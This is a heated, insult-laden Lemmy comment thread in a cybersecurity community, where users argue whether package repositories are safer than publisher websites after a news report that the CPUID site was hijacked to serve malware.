this post was submitted on 11 Apr 2026
1 points (100.0% liked)

cybersecurity

6049 readers
9 users here now

An umbrella community for all things cybersecurity / infosec. News, research, questions, are all welcome!

Community Rules

Enjoy!

founded 2 years ago
MODERATORS
shellsharks@infosec.pub
tweedge@infosec.pub
1
CPUID site hijacked to serve malware instead of HWMonitor downloads (www.theregister.com)
submitted 1 day ago by cm0002@infosec.pub to c/cybersecurity@infosec.pub
28 comments fedilink hide all child comments
you are viewing a single comment's thread
view the rest of the comments
[–] theunknownmuncher@lemmy.world 0 points 21 hours ago* (last edited 21 hours ago) (1 children)

I'll just paste what I already wrote in hopes that your reading comprehension benefits from reading it a second time:

It literally doesn't matter if it's a publisher site or not, users can't tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.

Again, louder this time, PACKAGE REPOSITORIES WILL ALWAYS BE OBJECTIVELY BETTER THAN RANDOM, UNTRUSTWORTHY WEBSITES.

Enjoy your ignorance and viruses

[–] Cypher@aussie.zone 0 points 19 hours ago (1 children)

It doesn't matter if the software is delivered via a publishers website or via a package repository if the supply chain has been compromised.

Clearly you're not aware of any recent cyber security news or you'd know that the NPM package manager has suffered numerous attacks: https://www.bleepingcomputer.com/news/security/shai-hulud-malware-infects-500-npm-packages-leaks-secrets-on-github/

I guess you should trust NPM though because its a package manager!

You're just encouraging people to blindly use and trust repos with no understanding of the pros or cons, and without understanding how you can verify and test software yourself to reduce risk. This is especially an easy conversaion when we talk closed source vs open source and you failed to even bring that up.

Repeating nonsense claims instead of actually considering the entirely reasonable question only highlights that you're victim to the Dunning-Kruger effect.

You could have had a conversation and learned something from an actual cyber security professional and instead you've acted like a clown.

[–] theunknownmuncher@lemmy.world 0 points 18 hours ago* (last edited 18 hours ago) (1 children)

ItS nOt PeRfEcT sO iT cAnT bE bEtTeR

Cope.

[–] Cypher@aussie.zone 0 points 18 hours ago (1 children)

hehehe seethe about it clown

[–] theunknownmuncher@lemmy.world 0 points 18 hours ago* (last edited 18 hours ago) (1 children)

You're so close to understanding. All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or do not apply to repos at all.

Please quote me where I claimed that software repositories are less vulnerable to supply chain attacks.

You were wrong about something, constructed a strawman argument, and are grasping at straws to save face.

[–] Cypher@aussie.zone 0 points 17 hours ago (1 children)

rAnDoM wEbSiTeS

[–] theunknownmuncher@lemmy.world 0 points 17 hours ago* (last edited 17 hours ago) (1 children)

That's what I thought.

Are you done speed-running through as many logical fallacies as possible? Multiple strawman arguments, no true scottsman/appeal to authority, name calling/ad hominem. You wouldn't have to resort to these if you were just correct, like me.

[–] Cypher@aussie.zone 0 points 17 hours ago (1 children)

Since you don't understand, you lowered the level of the conversation and now I'm going to continue on that level because you get what you deserve.

Ad hominem is a problem now when you started accusing me of lacking reading comprehension aka stupidity and then ignorance - in a field I am a professional in and have given reasoned and valid advice on.

In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo aren't malicious.

Given a real world example you simply ignore it "but search results" eat shit you moron. The legitimate website was popped so "rAnDoM wEbSiTeS" aren't a factor or relevant.

JuSt TrUsT iT bRo - nonsense uttered by an absolute fuckwit

[–] theunknownmuncher@lemmy.world 0 points 16 hours ago (1 children)

Addressing logical fallacies elevates the discussion to place where it can actually be productive, not lowers it.

In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo aren't malicious.

It's not relevant because it applies to both random websites and code repositories equally. Again, please quote me where I claimed that code repositories are not susceptible to this.

Ad hominem is a problem now when you started accusing me of lacking reading comprehension aka stupidity and then ignorance

You've demonstrated both of these, so it is just statement of fact. "you moron" this you?

[–] Cypher@aussie.zone 0 points 16 hours ago (2 children)

get ratiod fuckwit

[–] W98BSoD@lemmy.dbzer0.com 0 points 8 hours ago

Not you, but some advice(?).

[–] theunknownmuncher@lemmy.world 0 points 13 hours ago* (last edited 13 hours ago) (1 children)

All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or do not apply to repos at all.

Doesn't change that this ^ is a fact you can't refute, so I'm correct. Your entire argument is strawman arguing against claims that I've never made and name calling. You're basically just arguing with yourself. 🤷

[–] Krudler@lemmy.world 0 points 10 hours ago (1 children)

You can't tell after getting completely obliterated by downvotes and repeatedly rebutted that you're the one in weeds? Clueless much

[–] theunknownmuncher@lemmy.world 0 points 9 hours ago

And yet my point was never refuted